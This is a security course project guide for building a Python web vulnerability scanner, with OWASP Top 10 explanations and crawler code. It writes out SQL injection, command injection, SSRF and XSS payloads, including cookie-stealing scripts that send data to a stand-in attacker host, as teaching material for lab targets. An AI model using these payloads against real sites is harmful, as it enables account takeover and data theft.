Project 2: Web Application Vulnerability Scanner

Goal: Develop hands-on offensive security skills by building tools and lab environments that demonstrate real attack paths with safe, reproducible evidence.

Offensive Workflow and Safety

Every offensive task has a legal boundary and a safety boundary. Define scope, isolate labs, and collect evidence without causing damage.

Reconnaissance to Exploitation

Recon discovers surface area, scanning validates exposure, and exploitation demonstrates impact. Each phase should output artifacts that make the next phase precise and repeatable.

Post-Exploitation and Reporting

Access without evidence is not a result. The goal is reproducible findings, minimal persistence, and clear remediation steps.

Concept Summary Table

| Concept Cluster | What You Need to Internalize |
|---|---|
| Recon | Asset discovery and fingerprinting. |
| Exploitation | Controlled proof of impact. |
| Post-exploitation | Privilege escalation and evidence capture. |
| OpSec | Avoid collateral damage, use lab setups. |
| Reporting | Clear, actionable remediation output. |

Deep Dive Reading by Concept

| Concept | Book & Chapter |
|---|---|
| Recon & scanning | The Hacker Playbook 3 (recon chapters) |
| Web exploitation | Web Application Hacker’s Handbook (SQLi/XSS) |
| Post-exploitation | Penetration Testing by Weidman (post-ex chapters) |
| Reporting | PTES Technical Guidelines (reporting) |

Project Overview

| Attribute | Value |
|---|---|
| Difficulty | Intermediate |
| Time Estimate | 2-3 weeks |
| Programming Language | Python |
| Primary Framework | OWASP Top 10 |
| Main Book | “Bug Bounty Bootcamp” by Vickie Li |
| Knowledge Area | Web Security |

Learning Objectives

By completing this project, you will:

  1. Master the OWASP Top 10 - Understand each vulnerability class deeply enough to detect and exploit them
  2. Understand HTTP at the protocol level - Request/response headers, cookies, sessions, and state management
  3. Build automated security testing - Design scanners that find real vulnerabilities
  4. Learn attack surface discovery - Crawl applications to identify all input points
  5. Develop responsible disclosure skills - Report findings professionally with evidence

The Core Question

“How do web application scanners automatically find vulnerabilities that developers miss?”

Web applications are among the most exposed attack surfaces in modern organizations. Building your own scanner teaches you:

  • Why certain coding patterns create vulnerabilities
  • How injection attacks actually work at the request/response level
  • What separates false positives from true positives
  • The difference between automated scanning and skilled testing

Deep Theoretical Foundation

The HTTP Protocol: Your Attack Surface

Exploiting any web vulnerability comes down to sending HTTP requests and reading HTTP responses. You must understand this protocol intimately:

HTTP REQUEST ANATOMY
════════════════════

POST /login HTTP/1.1                           ◄── Request Line
Host: vulnerable-app.com                       ◄── Headers begin
User-Agent: Mozilla/5.0 (Windows NT 10.0)
Accept: text/html,application/xhtml+xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: session=abc123; tracking=xyz789       ◄── Cookies (session state)
Connection: close
                                               ◄── Blank line separates headers/body
username=admin&password=secret123              ◄── Request Body (POST data)


HTTP RESPONSE ANATOMY
═════════════════════

HTTP/1.1 200 OK                                ◄── Status Line
Date: Sat, 27 Dec 2025 12:00:00 GMT
Server: Apache/2.4.41 (Ubuntu)                 ◄── Information disclosure!
X-Powered-By: PHP/7.4.3                        ◄── More info disclosure!
Set-Cookie: session=def456; HttpOnly; Secure   ◄── New session cookie
Content-Type: text/html; charset=UTF-8
Content-Length: 1234
                                               ◄── Blank line
<!DOCTYPE html>                                ◄── Response Body
<html>
<head><title>Welcome Admin</title></head>      ◄── May reveal successful login
<body>...
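
To make the anatomy above concrete, here is a minimal sketch that splits a raw request into its request line, headers, and body, and recomputes the byte length that `Content-Length` has to carry. The helper name `parse_raw_request` is an illustrative assumption, not part of the project skeleton, and the parser deliberately ignores chunked encoding and repeated headers.

```python
from typing import Dict, Tuple


def parse_raw_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into (request line, headers, body)."""
    # Headers and body are separated by the first blank line (CRLF CRLF).
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    request_line = lines[0]
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # Header names are case-insensitive, so normalise them to lowercase.
        headers[name.strip().lower()] = value.strip()
    return request_line, headers, body


RAW_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "Host: vulnerable-app.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: session=abc123; tracking=xyz789\r\n"
    "\r\n"
    "username=admin&password=secret123"
)

request_line, headers, body = parse_raw_request(RAW_REQUEST)
method, path, version = request_line.split(" ")
# Content-Length counts bytes of the body, not characters.
body_length = len(body.encode("utf-8"))
print(method, path, body_length)
```

A scanner that builds requests by hand has to keep this length in sync with every injected payload; libraries such as `requests` do it automatically.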

Where Vulnerabilities Live

Web applications have multiple layers, each with unique attack surfaces:

┌─────────────────────────────────────────────────────────────────────┐
│                    WEB APPLICATION STACK                             │
│                  (Attack Surface at Every Layer)                     │
└─────────────────────────────────────────────────────────────────────┘

CLIENT SIDE (Browser)
┌─────────────────────────────────────────────────────────────────────┐
│                                                                     │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐    │
│  │   JavaScript    │  │  Local Storage  │  │    Cookies      │    │
│  │                 │  │                 │  │                 │    │
│  │ ● XSS attacks   │  │ ● Sensitive     │  │ ● Session       │    │
│  │   execute here  │  │   data exposure │  │   hijacking     │    │
│  │ ● DOM           │  │ ● No HttpOnly   │  │ ● CSRF tokens   │    │
│  │   manipulation  │  │   protection    │  │ ● Missing       │    │
│  │                 │  │                 │  │   Secure flag   │    │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘    │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              │  HTTP Request
                              ▼
┌─────────────────────────────────────────────────────────────────────┐
│  WEB SERVER (nginx, Apache, IIS)                                    │
│                                                                     │
│  ● Security headers (CSP, X-Frame-Options)                          │
│  ● TLS configuration (HTTPS)                                        │
│  ● Directory listings                                               │
│  ● Server version disclosure                                        │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────────┐
│  APPLICATION LAYER (PHP, Python, Node.js, Java)                     │
│                                                                     │
│  ┌─────────────────────────────────────────────────────────────┐   │
│  │                    INPUT HANDLING                             │   │
│  │                                                               │   │
│  │  URL Parameters:  /page?id=1        ← SQL Injection           │   │
│  │  POST Data:       username=admin    ← Auth Bypass             │   │
│  │  Headers:         User-Agent: ...   ← Log Injection           │   │
│  │  Cookies:         role=user         ← Privilege Escalation    │   │
│  │  File Uploads:    image.php.jpg     ← Remote Code Execution   │   │
│  │  JSON/XML:        {"user":"..."}    ← XXE, Deserialization    │   │
│  └─────────────────────────────────────────────────────────────┘   │
│                                                                     │
│  ┌─────────────────────────────────────────────────────────────┐   │
│  │                    BUSINESS LOGIC                             │   │
│  │                                                               │   │
│  │  ● IDOR (Insecure Direct Object Reference)                   │   │
│  │    GET /api/users/123 → Change to /api/users/124             │   │
│  │                                                               │   │
│  │  ● Authorization flaws                                        │   │
│  │    User can access admin functions                           │   │
│  │                                                               │   │
│  │  ● Race conditions                                            │   │
│  │    Submit payment twice quickly                              │   │
│  └─────────────────────────────────────────────────────────────┘   │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
┌─────────────────────────────────────────────────────────────────────┐
│  DATABASE LAYER                                                     │
│                                                                     │
│  ● SQL Injection (SELECT * FROM users WHERE id='$input')           │
│  ● NoSQL Injection (MongoDB query operators)                        │
│  ● Stored XSS (malicious data in database)                         │
│  ● Credential exposure (passwords in plaintext)                     │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘

Web Application Stack - Attack Surface at Every Layer

OWASP Top 10 2021: What Your Scanner Must Find

┌────────────────────────────────────────────────────────────────────┐
│              OWASP TOP 10 2021 VULNERABILITY CLASSES               │
└────────────────────────────────────────────────────────────────────┘

[A01] BROKEN ACCESS CONTROL
─────────────────────────────
What: Users can access resources they shouldn't
How to test:
  1. Change ?user_id=123 to ?user_id=124
  2. Access /admin without admin role
  3. Modify hidden form fields (role=admin)
  4. Bypass authentication via direct URL

Scanner Detection:
  ├── Test IDOR by incrementing/decrementing IDs
  ├── Access restricted paths without authentication
  └── Modify request parameters and observe response changes


[A02] CRYPTOGRAPHIC FAILURES
────────────────────────────
What: Sensitive data exposed due to weak/missing encryption
How to test:
  1. Check for HTTP (not HTTPS)
  2. Analyze password storage (MD5, plaintext visible)
  3. Look for sensitive data in responses

Scanner Detection:
  ├── Flag any non-HTTPS login pages
  ├── Check for password/credit card in response bodies
  └── Analyze Set-Cookie for missing Secure flag


[A03] INJECTION (SQL, Command, LDAP)
────────────────────────────────────
What: Untrusted data sent to interpreter as part of command
How to test:
  1. Add ' to inputs, look for SQL errors
  2. Try SQL payloads: ' OR '1'='1
  3. Test for command injection: ; ls -la
  4. LDAP injection: )(uid=*)

Scanner Detection:
  ├── Inject ' and " in all parameters
  ├── Analyze error messages for SQL syntax errors
  ├── Use time-based payloads: ' AND SLEEP(5)--
  └── Look for command output in responses


[A04] INSECURE DESIGN
─────────────────────
What: Missing security controls, flawed architecture
How to test:
  1. Check for rate limiting (brute force possible?)
  2. Review password reset flow
  3. Look for missing CAPTCHA

Scanner Detection:
  ├── Send 100 requests rapidly, check for rate limiting
  ├── Test password reset token predictability
  └── Note: Many design flaws need manual review


[A05] SECURITY MISCONFIGURATION
───────────────────────────────
What: Insecure default configs, unnecessary features
How to test:
  1. Check for default credentials
  2. Look for exposed admin interfaces
  3. Directory listing enabled?
  4. Stack traces in errors?

Scanner Detection:
  ├── Access /admin, /phpmyadmin, /wp-admin
  ├── Trigger errors, check for verbose messages
  ├── Test for directory listing: /images/
  └── Check common default credentials


[A06] VULNERABLE COMPONENTS
───────────────────────────
What: Using libraries with known CVEs
How to test:
  1. Identify framework/library versions
  2. Check against CVE databases
  3. Look for outdated JavaScript libraries

Scanner Detection:
  ├── Parse Server header for versions
  ├── Check JavaScript libraries against retire.js
  └── Identify framework from response patterns


[A07] AUTHENTICATION FAILURES
─────────────────────────────
What: Broken login, session management
How to test:
  1. Brute force with common passwords
  2. Session fixation attacks
  3. Session timeout (do sessions expire?)

Scanner Detection:
  ├── Try admin:admin, admin:password
  ├── Check if session ID changes after login
  ├── Look for session ID in URL (bad practice)
  └── Test remember-me token security


[A08] DATA INTEGRITY FAILURES
─────────────────────────────
What: Software updates without verification
How to test:
  1. Check for unsigned updates
  2. Look for insecure deserialization

Scanner Detection:
  ├── Limited automated testing
  └── Flag if application loads external resources


[A09] LOGGING/MONITORING FAILURES
─────────────────────────────────
What: Attacks go undetected
How to test:
  1. Trigger suspicious activity
  2. Check if you're blocked after failed logins

Scanner Detection:
  ├── Multiple failed logins - are you blocked?
  └── Note: Primarily manual review


[A10] SSRF (Server-Side Request Forgery)
────────────────────────────────────────
What: Server makes requests to attacker-controlled destinations
How to test:
  1. Find URL input parameters
  2. Try ?url=http://169.254.169.254 (AWS metadata)
  3. Try ?url=http://localhost:8080

Scanner Detection:
  ├── Inject URLs pointing to known callback server
  ├── Try cloud metadata URLs
  └── Test for internal port scanning via SSRF
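
As one example of turning a checklist item into code, the sketch below covers the "Analyze Set-Cookie for missing Secure flag" check. The function name `audit_set_cookie` is hypothetical, and checking `HttpOnly` and `SameSite` alongside `Secure` is an addition beyond the list above.

```python
from typing import Dict, List, Union


def audit_set_cookie(header_value: str) -> Dict[str, Union[str, List[str]]]:
    """Report which protective attributes a single Set-Cookie value lacks."""
    parts = [part.strip() for part in header_value.split(";")]
    cookie_name = parts[0].split("=", 1)[0]
    # Attribute names are case-insensitive; flags such as Secure carry no value.
    attributes = {part.split("=", 1)[0].strip().lower() for part in parts[1:] if part}
    missing = [flag for flag in ("secure", "httponly", "samesite") if flag not in attributes]
    return {"cookie": cookie_name, "missing": missing}


print(audit_set_cookie("session=def456; HttpOnly; Secure"))
print(audit_set_cookie("role=user"))
```

Each missing attribute would typically become a low-severity finding, with the raw header kept as evidence.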

SQL Injection Deep Dive

SQL injection remains prevalent because the mistake is easy to introduce (one concatenated string) and hard to detect reliably with automated tools:

NORMAL LOGIN QUERY
══════════════════

User Input:
  username: alice
  password: secret123

Application Code (VULNERABLE):
  query = "SELECT * FROM users WHERE username='" + username +
          "' AND password='" + password + "'"

Resulting Query:
  SELECT * FROM users WHERE username='alice' AND password='secret123'

Result: Only returns Alice's record if password matches


SQL INJECTION ATTACK
════════════════════

User Input:
  username: admin' --
  password: anything

Resulting Query:
  SELECT * FROM users WHERE username='admin' --' AND password='anything'
                                             ↑
                                    This is a SQL comment!
                                    Everything after is ignored

Actual Query Executed:
  SELECT * FROM users WHERE username='admin'

Result: Returns admin account WITHOUT password check!
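
The bypass above can be reproduced safely against an in-memory SQLite database. This is a sketch under assumptions: the table layout, the stored password, and the function names `login_vulnerable` and `login_parameterized` are invented for the demonstration.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cr3t')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    # String concatenation: user input becomes part of the SQL text.
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    # Placeholders: user input is passed as data and never parsed as SQL.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchall()


conn = build_db()
print(login_vulnerable(conn, "admin' --", "anything"))
print(login_parameterized(conn, "admin' --", "anything"))
```

The first call returns the admin row because the comment removes the password check; the second returns nothing because the whole input is compared as a literal username.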


UNION-BASED DATA EXTRACTION
═══════════════════════════

URL: /products?id=5

Normal Query:
  SELECT name, price, description FROM products WHERE id=5

Attack URL: /products?id=5 UNION SELECT username,password,email FROM users--

Resulting Query:
  SELECT name, price, description FROM products WHERE id=5
  UNION
  SELECT username, password, email FROM users--

Result: Page displays ALL usernames, passwords, and emails!


TIME-BASED BLIND SQL INJECTION
══════════════════════════════

When no visible output exists, measure response time:

Attack: /products?id=5' AND SLEEP(5)--

If the page takes 5+ seconds to load:
  → SQL injection confirmed!
  → Database is processing the SLEEP() command

Extracting data character by character:
  /products?id=5' AND IF(SUBSTRING(database(),1,1)='a',SLEEP(5),0)--

  If response takes 5 seconds → First char of database name is 'a'
  If response is instant → First char is NOT 'a', try 'b', 'c', etc.
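
The character-by-character loop described above can be sketched independently of any network code. Here the timing check is abstracted into an `oracle(position, char)` callable; `extract_value`, `fake_oracle`, and the sample name `shop_db` are all hypothetical stand-ins so the example runs without a target.

```python
import string
from typing import Callable


def extract_value(oracle: Callable[[int, str], bool],
                  max_length: int = 32,
                  alphabet: str = string.ascii_lowercase + string.digits + "_") -> str:
    """Recover a string one character at a time from a yes/no oracle.

    oracle(position, char) returns True when the character at the 1-based
    position equals char. In a real test that means "the response was slow".
    """
    recovered = ""
    for position in range(1, max_length + 1):
        for candidate in alphabet:
            if oracle(position, candidate):
                recovered += candidate
                break
        else:
            # No candidate matched: assume the end of the value was reached.
            break
    return recovered


SECRET = "shop_db"  # what the simulated database would return for database()


def fake_oracle(position: int, char: str) -> bool:
    return position <= len(SECRET) and SECRET[position - 1] == char


print(extract_value(fake_oracle))
```

In the worst case this costs one request per candidate per position, which is why real tools usually compare character codes with a binary search instead of testing each letter in turn.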

Cross-Site Scripting (XSS) Explained

XSS ATTACK TYPES
════════════════

REFLECTED XSS (Non-Persistent)
──────────────────────────────
Attack URL sent to victim via phishing:
  https://vulnerable.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>

Server reflects input in response:
  <h1>Search results for: <script>document.location='...'</script></h1>

Browser executes the script → Cookies stolen!


STORED XSS (Persistent)
───────────────────────
Attacker posts comment:
  Great product! <script>document.location='https://evil.com/steal?c='+document.cookie</script>

Comment saved in database, displayed to ALL users who view page
Every visitor's cookies are stolen automatically


DOM-BASED XSS
─────────────
Vulnerable JavaScript:
  document.getElementById('output').innerHTML = location.hash.substring(1);

Attack URL:
  https://vulnerable.com/page#<img src=x onerror=alert(document.cookie)>

Script never goes to server - executes entirely client-side


XSS PAYLOADS FOR TESTING
═══════════════════════════

Basic:
  <script>alert('XSS')</script>

Event handlers:
  <img src=x onerror=alert('XSS')>
  <body onload=alert('XSS')>
  <svg onload=alert('XSS')>

Filter bypasses:
  <ScRiPt>alert('XSS')</ScRiPt>                    # Case variation
  <script>alert(String.fromCharCode(88,83,83))</script>  # Char codes
  <img src=x onerror="&#97;lert('XSS')">           # HTML entities
  <script>eval(atob('YWxlcnQoJ1hTUycp'))</script>  # Base64

Context-aware:
  In attribute: " onmouseover="alert('XSS')
  In JavaScript: ';alert('XSS');//
  In URL: javascript:alert('XSS')
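
A scanner decides between "vulnerable" and "safe" by checking whether the payload comes back raw or encoded. The sketch below shows both outcomes for the reflected search example, using the standard library's `html.escape`. The two render functions are hypothetical stand-ins for server-side templates.

```python
import html

PAYLOAD = "<script>alert('XSS')</script>"


def render_unsafe(query: str) -> str:
    # Input is pasted into the page verbatim: the browser will run the script.
    return f"<h1>Search results for: {query}</h1>"


def render_escaped(query: str) -> str:
    # <, >, &, and both quote characters are replaced by HTML entities.
    return f"<h1>Search results for: {html.escape(query, quote=True)}</h1>"


print(render_unsafe(PAYLOAD))
print(render_escaped(PAYLOAD))
```

Note that `html.escape` is only sufficient for HTML body and quoted-attribute contexts. Input that lands inside a `<script>` block or a `javascript:` URL needs encoding specific to that context.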

Project Specification

What You’re Building

A modular web vulnerability scanner with the following structure:

web-vuln-scanner/
├── scanner.py              # Main scanner orchestrator
├── crawler.py              # Web crawler for attack surface discovery
├── modules/
│   ├── __init__.py
│   ├── sqli.py            # SQL injection tests
│   ├── xss.py             # XSS tests
│   ├── idor.py            # IDOR/access control tests
│   ├── ssrf.py            # SSRF tests
│   ├── headers.py         # Security headers analysis
│   └── disclosure.py      # Information disclosure tests
├── payloads/
│   ├── sqli.txt           # SQL injection payloads
│   ├── xss.txt            # XSS payloads
│   └── wordlists/         # Directory brute-force lists
├── reports/
│   └── templates/
│       └── report.html    # HTML report template
├── requirements.txt
└── README.md

Functional Requirements

1. Web Crawler (crawler.py)

Must implement:

  • Start from seed URL, discover all pages
  • Extract forms (action URL, method, input fields)
  • Extract links (href, src)
  • Respect robots.txt (optional override)
  • Handle relative and absolute URLs
  • Track visited URLs to avoid loops

Should implement:

  • JavaScript rendering (Selenium/Playwright)
  • API endpoint discovery
  • Handle authentication (cookie jar)
  • Rate limiting

Output: List of pages with their forms and parameters
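
The "respect robots.txt (optional override)" requirement can be sketched with the standard library's `urllib.robotparser`. The factory name `build_robots_checker`, the `lab-scanner` user agent, and the `lab.test` host are assumptions for illustration; a real crawler would first fetch `/robots.txt` from the target.

```python
from typing import Callable
from urllib.robotparser import RobotFileParser

ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
"""


def build_robots_checker(robots_txt: str, respect: bool = True) -> Callable[[str], bool]:
    """Return a function that tells the crawler whether a URL may be fetched."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())

    def allowed(url: str, user_agent: str = "lab-scanner") -> bool:
        # respect=False is the explicit override for authorised lab testing.
        if not respect:
            return True
        return parser.can_fetch(user_agent, url)

    return allowed


allowed = build_robots_checker(ROBOTS_TXT)
override = build_robots_checker(ROBOTS_TXT, respect=False)
print(allowed("http://lab.test/products?id=1"), allowed("http://lab.test/admin/users"))
```

Disallowed paths are often the most interesting part of the attack surface, so it can be useful to record them in the crawl output even when the crawler does not visit them.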

2. SQL Injection Scanner (modules/sqli.py)

Must implement:

  • Error-based detection (look for SQL errors in response)
  • Boolean-based detection (compare true/false responses)
  • Time-based detection (measure response delays)
  • Test all parameter types (GET, POST, cookies)

Should implement:

  • UNION-based exploitation
  • Identify database type (MySQL, PostgreSQL, MSSQL)
  • Extract table names
  • Payload encoding for WAF bypass
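
Boolean-based detection reduces to comparing three response bodies: the baseline, one for an always-true condition (for example `' AND '1'='1`), and one for an always-false condition (for example `' AND '1'='2`). A minimal sketch of that comparison follows; the function names and the 0.95 threshold are assumptions that would need tuning per target.

```python
from difflib import SequenceMatcher


def similarity(a: str, b: str) -> float:
    """Return a ratio between 0.0 (nothing in common) and 1.0 (identical)."""
    return SequenceMatcher(None, a, b).ratio()


def looks_boolean_injectable(baseline: str, true_body: str, false_body: str,
                             threshold: float = 0.95) -> bool:
    # The true-condition page should match the baseline, while the
    # false-condition page should differ noticeably.
    return (similarity(baseline, true_body) >= threshold
            and similarity(baseline, false_body) < threshold)


BASELINE = "<ul><li>Widget</li><li>Gadget</li></ul>"
EMPTY_RESULT = "<p>No products found</p>"
print(looks_boolean_injectable(BASELINE, BASELINE, EMPTY_RESULT))
```

Pages with dynamic content (timestamps, CSRF tokens, ads) lower the similarity even without injection, so fetching the baseline twice and measuring its natural variation first helps avoid false positives.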

3. XSS Scanner (modules/xss.py)

Must implement:

  • Reflected XSS detection
  • Multiple context detection (HTML, attribute, JavaScript)
  • Basic filter bypass payloads

Should implement:

  • Stored XSS detection (check if payload persists)
  • DOM-based XSS detection
  • Custom payload generation based on context

4. IDOR Scanner (modules/idor.py)

Must implement:

  • Detect numeric ID parameters
  • Test ID manipulation (increment/decrement)
  • Compare responses for different IDs

Should implement:

  • UUID/GUID manipulation
  • Test with different user sessions

5. Security Headers Analyzer (modules/headers.py)

Must check for:

  • Content-Security-Policy
  • X-Content-Type-Options
  • X-Frame-Options
  • Strict-Transport-Security
  • X-XSS-Protection (deprecated; modern browsers ignore it, so treat its absence as informational at most)
  • Server/X-Powered-By disclosure

6. Report Generator

Must implement:

  • JSON output for tool integration
  • HTML report with findings, evidence, recommendations
  • Severity ratings (Critical, High, Medium, Low)
  • Screenshots/evidence storage
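
A minimal sketch of the JSON output, assuming a simplified `Finding` record (a hypothetical stand-in for the project's `Vulnerability` dataclass) and a report layout with a severity summary followed by findings sorted from most to least severe:

```python
import json
from dataclasses import asdict, dataclass
from typing import List

SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}


@dataclass
class Finding:
    vuln_type: str
    severity: str
    url: str
    parameter: str
    evidence: str


def to_json_report(findings: List[Finding]) -> str:
    """Serialise findings, most severe first, with a per-severity count."""
    ordered = sorted(
        findings,
        key=lambda f: SEVERITY_ORDER.get(f.severity.lower(), len(SEVERITY_ORDER)),
    )
    summary = {level: 0 for level in SEVERITY_ORDER}
    for finding in ordered:
        key = finding.severity.lower()
        summary[key] = summary.get(key, 0) + 1
    return json.dumps({"summary": summary, "findings": [asdict(f) for f in ordered]}, indent=2)


REPORT = to_json_report([
    Finding("Missing header", "low", "http://lab.test/", "", "No Content-Security-Policy"),
    Finding("SQL Injection", "critical", "http://lab.test/products", "id", "SQL error in response"),
])
print(REPORT)
```

Keeping the JSON as the single source of truth and rendering the HTML report from it means both outputs always agree.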

Solution Architecture

Component Design

┌─────────────────────────────────────────────────────────────────────┐
│                     WEB VULNERABILITY SCANNER                        │
└─────────────────────────────────────────────────────────────────────┘
                              │
                              ▼
                    ┌───────────────────┐
                    │   Orchestrator    │
                    │   (scanner.py)    │
                    ├───────────────────┤
                    │ - Load config     │
                    │ - Initialize      │
                    │ - Coordinate      │
                    │ - Generate report │
                    └─────────┬─────────┘
                              │
        ┌─────────────────────┼─────────────────────┐
        │                     │                     │
        ▼                     ▼                     ▼
┌───────────────┐    ┌───────────────┐    ┌───────────────┐
│   Crawler     │    │   Modules     │    │   Reporter    │
├───────────────┤    ├───────────────┤    ├───────────────┤
│ - Discover    │    │ - SQLi        │    │ - Format      │
│   pages       │───►│ - XSS         │───►│   findings    │
│ - Extract     │    │ - IDOR        │    │ - Generate    │
│   forms       │    │ - Headers     │    │   HTML/JSON   │
│ - Map attack  │    │ - SSRF        │    │ - Severity    │
│   surface     │    │               │    │   rating      │
└───────────────┘    └───────────────┘    └───────────────┘

Key Data Structures

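from __future__ import annotations  # CrawlResult refers to Parameter and Form before they are defined

from dataclasses import dataclass
from typing import List, Optional

@dataclass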
class CrawlResult:
    url: str
    method: str  # GET, POST
    parameters: List[Parameter]
    forms: List[Form]
    response_code: int

@dataclass
class Parameter:
    name: str
    value: str
    location: str  # query, body, cookie, header
    param_type: str  # string, numeric, email, etc.

@dataclass
class Form:
    action: str
    method: str
    inputs: List[FormInput]

@dataclass
class FormInput:
    name: str
    input_type: str  # text, password, hidden, etc.
    value: Optional[str]

@dataclass
class Vulnerability:
    vuln_type: str  # sqli, xss, idor, etc.
    severity: str  # critical, high, medium, low
    url: str
    parameter: str
    payload: str
    evidence: str
    reproduction_steps: List[str]
    recommendation: str

Testing Flow

SCANNER WORKFLOW
════════════════

1. CRAWLING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  Start URL: https://target.com                              │
   │                                                             │
   │  → Visit page                                               │
   │  → Extract links: /login, /products, /about                 │
   │  → Extract forms: login form, search form                   │
   │  → Queue new URLs for crawling                              │
   │  → Repeat until all URLs visited                            │
   │                                                             │
   │  Result: Attack surface map                                 │
   │    - 50 unique pages                                        │
   │    - 12 forms                                               │
   │    - 85 parameters                                          │
   └─────────────────────────────────────────────────────────────┘

2. TESTING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  For each parameter in attack surface:                      │
   │                                                             │
   │  SQLi Module:                                               │
   │    - Inject ' and " → Check for SQL errors                 │
   │    - Try boolean payloads → Compare responses              │
   │    - Try time-based → Measure delays                       │
   │                                                             │
   │  XSS Module:                                                │
   │    - Inject <script>alert(1)</script>                      │
   │    - Check if payload appears in response                  │
   │    - Test multiple contexts                                 │
   │                                                             │
   │  IDOR Module:                                               │
   │    - If numeric ID found, try adjacent values              │
   │    - Compare response content                               │
   │                                                             │
   │  ...repeat for each module...                              │
   └─────────────────────────────────────────────────────────────┘

3. REPORTING PHASE
   ┌─────────────────────────────────────────────────────────────┐
   │  Aggregate all findings:                                    │
   │    - Critical: 2 SQLi vulnerabilities                       │
   │    - High: 5 XSS vulnerabilities                           │
   │    - Medium: 3 IDOR issues                                  │
   │    - Low: 8 missing security headers                        │
   │                                                             │
   │  Generate report with:                                      │
   │    - Executive summary                                      │
   │    - Technical details for each finding                    │
   │    - Reproduction steps                                     │
   │    - Recommendations                                        │
   └─────────────────────────────────────────────────────────────┘

Web Vulnerability Scanner Workflow - Three Phase Process
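
The testing phase above is essentially a nested loop over targets and modules. The sketch below shows one way the orchestrator could drive it. `run_scan`, the `(url, parameter)` target tuples, and the two stand-in modules are assumptions for illustration, not the project's required interface.

```python
from typing import Callable, Dict, List, Tuple

Target = Tuple[str, str]                      # (url, parameter name)
Finding = Dict[str, str]
Module = Callable[[Target], List[Finding]]


def run_scan(targets: List[Target], modules: Dict[str, Module]) -> List[Finding]:
    """Run every module against every target and collect the findings."""
    findings: List[Finding] = []
    for target in targets:
        for name, module in modules.items():
            try:
                results = module(target)
            except Exception as exc:
                # A crashing module should not abort the whole scan.
                print(f"[{name}] failed on {target[0]}: {exc}")
                continue
            findings.extend({"module": name, **finding} for finding in results)
    return findings


# Stand-in modules so the sketch runs without a target.
def fake_sqli(target: Target) -> List[Finding]:
    url, param = target
    return [{"severity": "critical", "url": url, "parameter": param}] if param == "id" else []


def broken_module(target: Target) -> List[Finding]:
    raise RuntimeError("simulated module failure")


SCAN_RESULTS = run_scan(
    [("http://lab.test/products", "id"), ("http://lab.test/search", "q")],
    {"sqli": fake_sqli, "broken": broken_module},
)
print(SCAN_RESULTS)
```

Registering modules in a dictionary keeps the orchestrator unaware of individual vulnerability classes, so adding `ssrf.py` later only means adding one entry.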


Phased Implementation Guide

Phase 1: HTTP Client and Crawler Foundation (Days 1-3)

Goal: Crawl a simple website and extract all forms

Implementation steps:

  1. Create HTTP session wrapper:

```python
import requests
from urllib.parse import urljoin, urlparse


class WebSession:
    """Thin wrapper around requests.Session that resolves URLs against a base."""

    def __init__(self, base_url: str, timeout: int = 10):
        self.session = requests.Session()  # keeps cookies between requests
        self.base_url = base_url
        self.timeout = timeout
        self.visited = set()  # URLs the crawler has already fetched

    def get(self, url: str) -> requests.Response:
        full_url = urljoin(self.base_url, url)
        return self.session.get(full_url, timeout=self.timeout)

    def post(self, url: str, data: dict) -> requests.Response:
        full_url = urljoin(self.base_url, url)
        return self.session.post(full_url, data=data, timeout=self.timeout)
```
  2. Implement HTML parser for links and forms:

```python
from typing import List
from urllib.parse import urljoin, urlparse

from bs4 import BeautifulSoup

# Form and FormInput are the dataclasses from "Key Data Structures"


def extract_links(html: str, base_url: str) -> List[str]:
    soup = BeautifulSoup(html, 'html.parser')
    links = []
    for a in soup.find_all('a', href=True):
        link = urljoin(base_url, a['href'])
        # Stay in scope: keep only links on the same host as the page
        if urlparse(link).netloc == urlparse(base_url).netloc:
            links.append(link)
    return links


def extract_forms(html: str, base_url: str) -> List[Form]:
    soup = BeautifulSoup(html, 'html.parser')
    forms = []
    for form in soup.find_all('form'):
        action = urljoin(base_url, form.get('action', ''))
        method = form.get('method', 'get').upper()
        inputs = []
        for inp in form.find_all(['input', 'textarea', 'select']):
            inputs.append(FormInput(
                name=inp.get('name', ''),
                input_type=inp.get('type', 'text'),
                value=inp.get('value', '')
            ))
        forms.append(Form(action, method, inputs))
    return forms
```

  3. Implement BFS crawler:
```python
from collections import deque

def crawl(start_url: str, max_pages: int = 100) -> List[CrawlResult]:
    session = WebSession(start_url)
    queue = deque([start_url])
    results = []

    while queue and len(results) < max_pages:
        url = queue.popleft()
        if url in session.visited:
            continue
        session.visited.add(url)

        try:
            response = session.get(url)
            links = extract_links(response.text, url)
            forms = extract_forms(response.text, url)
            params = extract_url_params(url)

            results.append(CrawlResult(url, 'GET', params, forms, response.status_code))

            for link in links:
                if link not in session.visited:
                    queue.append(link)
        except Exception as e:
            print(f"Error crawling {url}: {e}")

    return results
```

Verification: Crawl DVWA or OWASP WebGoat and list all discovered forms
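
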